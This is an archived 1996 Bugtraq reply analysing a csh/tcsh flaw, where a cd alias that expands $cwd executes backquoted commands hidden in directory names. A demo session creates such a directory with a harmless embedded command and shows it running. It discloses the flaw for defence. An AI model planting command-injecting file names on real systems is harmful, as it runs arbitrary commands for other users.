[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: tee see shell problems
From: Paul Szabo <szabo_p () maths ! su ! oz ! au>
Date: 1996-09-18 10:44:09
[Download RAW message or body]
> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with back tic's.
It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):
tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------ 2 psz system 512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw------- 1 psz system 0 Sep 18 10:28 silly
Paul Szabo - System Manager // School of Mathematics and Statistics
psz@maths.usyd.edu.au // University of Sydney, NSW 2006, Australia
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic